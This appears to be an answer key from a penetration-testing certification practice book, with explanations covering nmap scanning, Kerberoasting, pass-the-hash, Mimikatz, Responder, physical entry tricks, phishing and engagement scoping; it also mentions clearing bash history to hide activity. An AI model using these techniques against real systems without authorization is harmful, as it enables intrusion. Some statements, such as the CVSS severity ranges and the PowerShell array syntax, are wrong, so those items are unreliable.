C. In this scenario, the best approach would be to determine the client’s tolerance to impact by conducting an impact analysis. Since this vulnerability scanner may have the potential of bringing their system down, you need to know what the client’s tolerance levels are and how a down system will affect the client. You also need to make sure the client is aware of all the risks associated with running the scanner.

Answer 492

A

C. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Answer 493

A

C. In a bluejacking wireless exploit, unsolicited messages are sent over a Bluetooth connection to wireless devices, such as a mobile phone.

Answer 494

A

A. A nondisclosure agreement (NDA) is a legal agreement that protects information that a contractor may discover during a penetration test. It forbids the contractor from revealing such information to unauthorized parties.

Answer 495

A

B. The device in this example is most likely a Windows workstation. This is evidenced by the fact that the default SMB/CIFS file sharing ports are open on the system.

Answer 496

A

D. Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.

Answer 497

A

C. To implement a DLL hijacking exploit, the penetration tester needs to have read/write permissions to the target file system. Using unsecure file and folder permission can make this task much easier to accomplish.

Answer 498

A

C. A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.

Answer 499

A

B. In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

Answer 500

A

A. A dictionary attack is a method of breaking into a password-protected computer or server by thoroughly entering every word in a dictionary as a password. Dictionary attacks work because many computer users use ordinary words as passwords. Dictionary attacks rely on a prebuilt dictionary of words. In many cases, penetration testers can add additional specific dictionary entries to a dictionary file for their penetration test based on knowledge; this can be beneficial in performing a dictionary attack. In this scenario, the penetration tester used social media to find additional keywords that may be beneficial in a dictionary attack.

Answer 501

A

B. The host is most likely running Windows. TCP ports 139, 445, and 3389 are all commonly used for Windows file sharing services. While these ports could also be used on other operating systems (such as a Linux system with the SMB daemon running), it is more likely to be a Windows host.

Answer 502

A

B. In a bluesnarfing wireless exploit, an unauthorized Bluetooth connection is established with a wireless device, such as a mobile phone. That connection is then used to steal information from that device.

Answer 503

A

B. The penetration tester in this scenario is using an exploit Kerberoasting. Any valid domain user can request an SPN for a registered service. The Kerberos ticket received as a result can be taken offline and cracked, potentially exposing the service account password. This can allow privilege escalation because it’s not uncommon for the service account to have administrator-level permissions to the local server.

Answer 504

A

B. Lock bypass occurs when an attacker prevents a door’s locking mechanism from working. In this example, this was done by placing a wooden wedge in the door jamb, preventing the door from closing completely and preventing the locking mechanism from engaging.

Answer 505

A

B. It is important that all penetration testers keep carefully written logs of the actions they take during an assessment. These logs should identify what the tester did, when they did it, what system(s) they were using, what system(s) they were attacking, and what the results were. You should avoid relying upon tester or client memories alone. They tend to be faulty and incomplete.

Answer 506

A

B. In this example, the nmap utility was used to simply list available targets. This is done by running nmap with the –sL option. This causes nmap to list hosts, but not actually scan them.

Answer 507

A

B and C. Most likely, the client will want to know what kind of report you are going to provide them with once the test is complete. They will also want to know how long it will take to remediate their systems as a result of the test.

Answer 508

A

A and D. Both spear phishing and whaling require the penetration tester to conduct extensive research to identify high-value target individuals within the organization.

Answer 509

A

C. Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are planned and coordinated to occur at the appropriate time.

Answer 510

A

A and C. Advanced persistent threats (APTs) are typically aimed at high-value targets, such as governments, defense contractors, multinational organizations, and financial organizations. Online learning websites, dental practices, and even community colleges are typically not valuable enough as targets to warrant an APT.

Answer 511

A

A. This discussion should have occurred during the planning and scoping phase. The penetration testing firm and the client should have agreed upon the rules to complete the assessment before the test began. This information should have been recorded in a written statement of work (SOW) that clearly identified the tools and techniques the penetration testers were allowed to use and the risks of using them.

Answer 512

A

B. In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 513

A

A and E. You can enter /bin/bash ~/myexploit or chmod u+x ~/myexploit to make the script execute.

Answer 514

A

C. Verbal permission is usually considered insufficient. Before beginning a penetration test, you must obtain a signed agreement from senior management giving you permission to conduct the test. This agreement will function as a “get out of jail free” card should your activities be reported to authorities. The other parameters described in this scenario have been defined appropriately.

Answer 515

A

B. The –D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Answer 516

A

D. In this scenario, the client has determined that the risk is an acceptable one and will not take measures to control it. Typically, this happens when an organization determines that the cost of removing or controlling a risk exceeds the cost of a security incident arising from that risk.

Answer 517

A

B. In this scenario, you need to test the modified exploit before actually attacking the target servers to make sure it works and doesn’t have any unintended consequences. An effective way to do this is to use your enumeration information to re-create the target systems as virtual machines in a lab environment and test the modified exploit. This process is called proof-of-concept development.

Answer 518

A

D. The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

Answer 519

A

A. The PCI -DSS standard is an industry standard for ensuring that organizations that process credit cards comply with certain security requirements. Because you are testing the client’s adherence to these requirements, you are conducting a compliance-based assessment.

Answer 520

A

D. Egress sensor bypass occurs when an attacker manipulates an egress sensor to unlock a door. In this scenario, the moving compressed air from the air duster is much colder and denser than the surrounding air, causing the egress sensor to think someone is exiting the building and unlock the door.

Answer 521

A

D. The “Account lockout threshold” Group Policy setting determines the number of failed logon attempts a user is allowed to make before the account is locked. A locked account can’t be used again until it is unlocked by an administrator or the lockout period for the account has elapsed. This policy setting can help prevent brute-force attacks by locking an account after only a few guessing attempts.

Answer 522

A

C. In this scenario, since it is port 23 that is open, this indicates the server you are on is a Telnet server. Telnet is a user command and an underlying TCP/IP protocol for accessing remote computers. Using Telnet, an administrator or another user can access someone else’s computer remotely. Telnet uses a command-line interface. Information transmitted between the Telnet server and client is sent unencrypted. This means that any authentication information may also be captured.

Answer 523

A

A. Before a wireless network interface can be used to capture wireless network traffic, it must be configured to run in monitor mode on the specific channel used by the transmitting access point.

Answer 524

A

D. Code testing is often done using static or dynamic code analysis along with testing methods like fuzzing and fault injection. Once changes are made to the code and it is deployed, it must be retested to ensure that the changes didn’t create any new security issues. Since we are only reviewing the code in this scenario, we will be conducting a static code analysis. Static code analysis, also known as source code analysis, is done by reviewing the code of an application. Since static analysis uses the source code, it can be seen as a type of white-box testing with full visibility. This can allow testers to find problems that other tests might fail to spot.

Answer 525

A

A. The greatest security risk associated with a biometric fingerprint reader is the fact that they can be fooled by a fake fingerprint. In an episode of the television show MythBusters several years ago, the cast was able to defeat a fingerprint reader by lifting an authorized user’s fingerprint from a cup. In this scenario, you should probably recommend that the client upgrade to a facial recognition authentication system as they have been proven to be more difficult to fool.

Answer 526

A

B. Under Ports Used, notice that port 80 TCP is open on the device. This indicates that it most likely is running an HTTP web server.

Answer 527

A

B. The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

Answer 528

A

C. In this example, the nmap utility was used to run a UDP scan. However, the –vv option was included to greatly increase the verboseness of the output.

Answer 529

A

C. In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Answer 530

A

B. In this scenario, the best option to tell the client would be by using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 531

A

C. A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.

Answer 532

A

C. In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network.

Answer 533

A

B. When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{“element_name”:”value”}].

In this example, the line Target = [{“HostName”:”FS1”}] assigns a value of FS1 to the element named HostName within the Target array.

Answer 534

A

B. The –oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Answer 535

A

B and D. In this scenario, dumpster diving was used to find the discarded access badge. Then badge cloning was used to create a fake badge.

Answer 536

A

A. A while loop will keep processing over and over until the specified condition evaluates to false.

Answer 537

A

C. Many penetration testing tools may be covered by export restrictions. The United States prohibits the export of some types of software and hardware, including encryption tools. If you transfer these tools internationally over the Internet, you could be arrested.

Answer 538

A

B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords, and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 539

A

D. In this scenario, the IP address of your computer was blacklisted. Blacklisting is part of your client’s defensive practices. Your scans were detected by an intrusion protection system (IPS), and as a result, the IP address used by your computer was entered on a blacklist. Blacklisting works by maintaining a list of applications and other “known” information. In this case, your IP address was used to deny you access to the network.

Answer 540

A

D. The rules of engagement (ROE) should have been clearly defined and signed by both parties before the penetration test begins. Not having the ROE in place exposes your organization to potential litigation should something go wrong during the testing process. The vetting of a new client occurs during the process of scoping the test and creating the ROE document. An MSA defines terms that will govern future agreements.

Answer 541

A

B. The XLM Schema Definition (XSD) is a W3C specification that identifies how to define elements within an XML document.

Answer 542

A

C. Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.

Answer 543

A

D. In a DOM XSS exploit, the attacker exploits weaknesses in the victim’s web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.

Answer 544

A

C. System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:
- Application hardening
- Operating system hardening
- Server hardening
- Database hardening
- Network hardening

Answer 545

A

B. The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits used during the penetration test because of the adverse effects they may be having on the network.

Answer 546

A

A. A credentialed vulnerability scan requires you to first authenticate to the network, preferably with an administrative-level account. Because administrative credentials are used, this type of scan usually identifies the most vulnerabilities.

Answer 547

A

C. One way to harden a server system is to reconfigure it to save its log entries to a dedicated logging server somewhere else on the network. This makes it harder for an attacker to cover his or her tracks after a compromise because the log files aren’t stored locally.

Answer 548

A

A. Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security.
- Monitoring: Packet capture and export of data to text files for further processing by third-party tools.
- Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection.
- Testing: Checking Wi-Fi cards and driver capabilities.
- Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).

Answer 549

A

D. The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

Answer 550

A

A and B. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must restrict physical access to all cardholder data and that the CDE network be isolated from the rest of the network.

Answer 551

A

A. Usually, when NAC is implemented with IPSec, network devices (such as desktops and laptops) must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. Otherwise, they are placed on an isolated remediation network until they come into compliance. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers’ systems without proving they are in compliance every time they connect.

Answer 552

A

A. NetBIOS is a transport protocol used by Windows systems to share resources, such as shared folders or printers. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device’s computer name and identify whether it is a workstation or a server. All of this information can be gathered without any kind of authentication.

Answer 553

A

A. In this scenario, there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client uses only port 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 554

A

B. In a USB key drop exploit, some type of malware is usually loaded on a flash drive. That drive is then deliberately left somewhere that an employee of the target organization will likely find it. The goal is for the employee to plug it in to see what it contains. When this happens, the malware is automatically loaded on the victim’s computer.

Answer 555

A

C. The –T option configures the speed at which nmap runs vulnerability scans. In this scenario, the subnet is potentially huge, with more than 16 million possible IP addresses. Running nmap with the –T0 option on a subnet this large will take a long time to complete.

Answer 556

A

B. You should recommend they use LDAPS on port 636 to manage user accounts. LDAPS is secured with SSL. Standard LDAP on port 389 transmits data on the network as clear text. This means the administrative user credentials you submit to access the directory service itself as well as any credentials of the users being managed are transmitted as clear text.

Answer 557

A

B. The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester’s previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.

Answer 558

A

B. Hacktivists may want to make a political or social point. Hacktivists aren’t typically doing attacks for money. They are individuals or groups of hackers who get together and see themselves as fighting for injustice. Hacktivists employ the same tools and tactics as hackers.

Answer 559

A

A and D. The process of enumeration involves connecting to each host discovered on the network segment and identifying key information, including the services each host is running as well as the version number of the installed operating system.

Answer 560

A

D and E. OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

Answer 561

A

A and C. In this scenario, you used deception and social engineering to gain access to the target organization’s physical network.

Answer 562

A

A. Penetration testers seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The first D in DAD stands for disclosure, which refers to gaining unauthorized access to information or systems. In this scenario, Natasha has gained access to information within the backend database that she should not have access to.

Answer 563

A

A and D. In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.

Answer 564

A

C. In a clickjacking exploit, the tester adds transparent layers to a web page in an attempt to fool a user into clicking a hidden button or link on a transparent layer. This allows the tester to hijack user clicks and send them to a different website (such as a credential harvesting site).

Answer 565

A

C. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password–based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute-force the user accounts when it’s finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.

Answer 566

A

B. Any CVSS score between 4.0 and 6.0 is considered to be in the Medium Risk category. Therefore, a CVSS score of 5.3 indicates that this is a medium-risk vulnerability.

Answer 567

A

A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 568

A

A. A credentialed vulnerability scan requires you to first authenticate to the network, preferably with an administrative-level account. Because administrative credentials are used, this type of scan most closely approximates the perspective of an internal administrator.

Answer 569

A

C. Any CVSS score between 6.0 and 10.0 is considered to be in the High Risk category. Therefore, a CVSS score of 7.2 indicates that this is a high-risk vulnerability.

Answer 570

A

C. The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Answer 571

A

C. The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Answer 572

A

D. A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a one-to-many search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as false acceptance rates (FARs) and false rejection rates (FRRs).

Answer 573

A

A. The *** characters in the output of the traceroute command indicate that the router for that particular hop of the route is up and forwarding traffic, but it isn’t allowed to respond to the pings used by the traceroute command.

Answer 574

A

D. A white box penetration test provides complete access to the internal network, including configuration settings of key infrastructure devices such as routers, switches, access points, and servers. For this reason, white box tests are sometimes referred to as full-knowledge tests because they provide full access and visibility.

Answer 575

A

D. A stealth scan enumerates hosts on the target network by manipulating the TCP three-way handshake. First, it sends the target a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. Rather than complete the connection by sending the target an ACK packet, the scanning host resets the connection by sending a RST packet.

Answer 576

A

C. A scope creep, or the addition of more items and targets to the scope of the assessment, is a constant menace for penetration testing. During the scoping phase, a tester is unlikely to know all of the details of what may be uncovered, and during the assessment itself, a tester may encounter unexpected new targets. Scope creep refers to how a project’s requirements tend to increase over a project life cycle.

Answer 577

A

D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.

Answer 578

A

B. The Sarbanes-Oxley act sets standards for publicly traded U.S. companies with respect to security policies, standards, and controls. For example, it sets standards for network access, authentication, and security.

Answer 579

A

A and D. Rather than purchasing a Windows system, you can simply create the exploit code on your Linux system and then cross-compile the code such that it can run on Windows systems. Various Linux utilities are available that can do this for you.

Answer 580

A

A and E. A container can be used to create an isolated environment, much like a virtual machine. As a result, any applications running within a container environment may not be detectable by traditional vulnerability scans. Unlike a virtual machine, a container shares much of the base operating system with the container host. Therefore, vulnerabilities associated with the base operating system of the container host may be inherited by its containers.

Answer 581

A

A. In a standard phishing exploit, email messages are sent indiscriminately to a large number of individuals, hoping that a percentage of them will click the malicious link contained in the message.

Answer 582

A

D. A black box penetration test should simulate the view an external attacker would have of the network. Therefore, the tester should have little or no knowledge of the internal network.

Answer 583

A

A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 584

A

A. A discovery scan is designed to simply map out every system on the target network. As such, it uses very nonintrusive mechanisms (such as ping) to enumerate the network.

Answer 585

A

A. Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.

Answer 586

A

A and B. The SNMPv1 protocol is an older protocol that uses the concept of a community string instead of a password. The same community string is used to authenticate to every SNMPv1 host in the network. By convention, most SNMPv1 administrators set the community string to a value of public. Even if a unique community string were used, it was easy to discover because it was transmitted as clear text on the network.

Answer 587

A

A. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.

Answer 588

A

D. All of the options shown in this question will cause nmap to detect services running on the target host. However, only the –sV option can be used with nmap to detect the version number of those services.

Answer 589

A

B, C, and D. Shell upgrade, VM escape, and container escape are all examples of sandbox escape exploits.

Answer 590

A

B. In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 591

A

A. nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 592

A

A. X11 forwarding can be used to remotely manage Linux systems over a network connection using a graphical user interface.

Answer 593

A

A. The U.S. government’s Computer Emergency Response Team (CERT) maintains a website at http://www.us-cert.gov that contains a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to CERT.

Answer 594

A

A. The chage command can be used on Linux systems to configure password aging for user accounts. For example, it can be used to lock a user account if the user doesn’t change their password after a certain number of days.

Answer 595

A

B. A risk assessment typically involves identifying areas of vulnerability or potential weakness and providing a road map to a stronger security posture. In this scenario, the client fully understands that the penetration testing could cause disruptions to their network, and they are willing to accept those risks.

Answer 596

A

B. Because the tester is using an internal email account (the kind used by a typical employee) to conduct the test, the tester is most likely performing a gray box test. In a black box test, the tester would have to use an external email account. In a white box test, the tester would likely use elevated privileges and access to conduct the test.

Answer 597

A

C. reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.

Answer 598

A

B. The nslookup utility can be used to resolve a domain name into its associated IP address.

Answer 599

A

B. A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 600

A

B. A full scan interrogates each host discovered on the target network using intrusive methods. A full scan is usually detected (and possibly blocked) quickly by IDS or IPS devices. Because of this, full scans are more likely to be used by a defender to thoroughly test his or her network. A penetration tester is less likely to use a full scan because it can be detected so quickly. The exception would be a white box test where everyone is already expecting the penetration tester to be running vulnerability scans.

Answer 601

A

D. This is an example of a DLL hijacking exploit. The malicious DLL likely contains the same functions that the original DLL did, allowing applications that rely on it to function correctly. However, it can also contain malicious code that executes when the DLL is loaded.

Answer 602

A

A. The nmap –Tn option is used to specify a timing template, where n is a number between 0 and 5. The higher the number, the faster the vulnerability scan. The lower the number, the slower the scan.

Answer 603

A

A. The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Answer 604

A

D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services pretending to be the system that the query is intended for.

Answer 605

A

B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 606

A

D. Red team assessments are typically more targeted than normal penetration tests. The red team acts like an attacker, targeting sensitive data or systems with the goal of acquiring access. Goal-based or objective-based assessments are usually designed to assess the overall security of an organization. Compliance-based assessments are designed to test compliance with specific laws.

Answer 607

A

A. Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Answer 608

A

C. Requiring multiple sign-offs on payouts is an example of a process-based mitigation strategy.

Answer 609

A

A. The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.

Answer 610

A

B. The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.

Answer 611

A

A, D, and F. A penetration tester will want to immediately report more serious issues with the client directly. Some of these will be documented in the report to the client at the end of testing; however, there are a few times when a penetration tester should call the client immediately, and they are as follows: to report any critical findings, report any indicators of compromise, or to report if the server becomes unresponsive to the testing.

Answer 612

A

B. Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. In this scenario, the attacker is attempting to manipulate an HTML iframe with JavaScript code using a web browser.

Answer 613

A

B. A script kiddie may have a variety of motivations. One of the most common is attention. They frequently brag about their exploits in online forums and social media. A malicious insider is usually motivated by either revenge or financial gain. An organized crime actor is most likely motivated by financial gain. A nation-state is most likely motivated by political or military goals.

Answer 614

A

D. In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 615

A

C. SOAP is an API standard that relies on XML and related schemas. XML-based specifications are governed by XML Schema Definition (XSD) documents. Having a good reference of what a specific API supports can be valuable for a penetration tester. This question specifically asks about XML files, so the SOAP project files would be the most beneficial.

Answer 616

A

B and C. You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization’s web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

Answer 617

A

A. In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). An HSTS response header lets a website tell browsers that it should be accessed using only HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 618

A

B. When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

Answer 619

A

C. Applications developed in-house aren’t usually subjected to the same level of scrutiny as commercial applications, which make them possible attack vectors that can be exploited. For example, when generating sample application requests, most penetration testers throw unexpected information at applications developed in-house to see how the application responds. For example, you may find that entering a very long text string into a field that is expecting only eight characters could generate a buffer overflow error. You could then use this poor error handling behavior to insert and run malicious code on the web server hosting the application.

Answer 620

A

A. On a Windows system, cPassword is the name of the attribute that stores passwords in a Group Policy Preference item. Whenever a preference requires a user’s password to be saved, it gets stored within this attribute in encrypted format. However, the password can be easily decrypted by any authenticated user in the domain.

Answer 621

A

C. Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 622

A

A. Double-tagging of VLAN tags is allowed in the 802.1q specification. This allows a host to “hop” between VLANs.

Answer 623

A

A. This is an example of DNS poisoning. This exploit leverages the trust users have in a URL that appears to be valid. Because users enter a valid URL, they have no idea than an exploit is being conducted. However, the DNS server itself has been reconfigured to resolve the domain name in URL to the IP address of the malicious server.

Answer 624

A

B. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems.

Answer 625

A

A. Remote Procedure Call (RPC)/Distributed Component Object Model (DCOM) is used on Windows systems and allows you to remotely execute code on a different Windows system.

Answer 626

A

C. The Web Application Description Language (WADL) is an XML-based machine-readable description of HTTP-based web services. As such, it is typically used with REST services instead of SOAP.

Answer 627

A

B and D. To harden user accounts on a Windows-based computer system, you should use Group Policy to enforce password complexity requirements. For example, you could require a certain password length and that it contain specific character combinations. You should also use Group Policy to enforce password aging requirements. This requires users to change their passwords on a regular basis.

Answer 628

A

D. Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 629

A

A. By searching the Internet for the operating system version number displayed under Operating System, you can likely discover the default administrative username and password used by the device. Several high-profile exploits over the last few years have been facilitated by the fact that the system implementer failed to change the default username and password used by network infrastructure devices.

Answer 630

A

D. The process of enumeration involves connecting to each host discovered on the network segment and identifying key information. In this example, notice that the OS class of the device is as follows:
- Type: WAP
- Vendor: Belkin
- OS Family: Embedded
- From this information, you can reasonably infer that this device is a wireless access point.

Answer 631

A

A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Answer 632

A

A and C. Part of the scoping process is to determine whether the penetration test will assess the organizations susceptibility to a specific known vulnerability or whether it should investigate unknown vulnerabilities. Because this is an external black box test, the client probably won’t provide user accounts or physical access to their facility.

Answer 633

A

B. The for looping structure will process a specified number of times.

Answer 634

A

A. Dumpster diving occurs when an attacker searches through the target organization’s garbage looking for sensitive information.

Answer 635

A

B. Gray box tests are a combination of black box and white box testing. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A gray box test can help focus penetration testers’ effort and time while providing a precise view of what the malevolent insider would actually encounter. In a black box penetration test, the tester has no prior knowledge of the target. In a white box test, the tester has extensive knowledge of the target.

Answer 636

A

A and B. To ensure persistence of the compromise, you could create a backdoor into the system or create a user account for yourself.

Answer 637

A

D. A whaling attack is essentially a form of spear phishing attack that is aimed specifically at C-suite employees, such as the CEO, CFO, COO, CIO, and so on. A standard spear phishing attack, on the other hand, would have been sent to a lower-level employee within the organization.

Answer 638

A

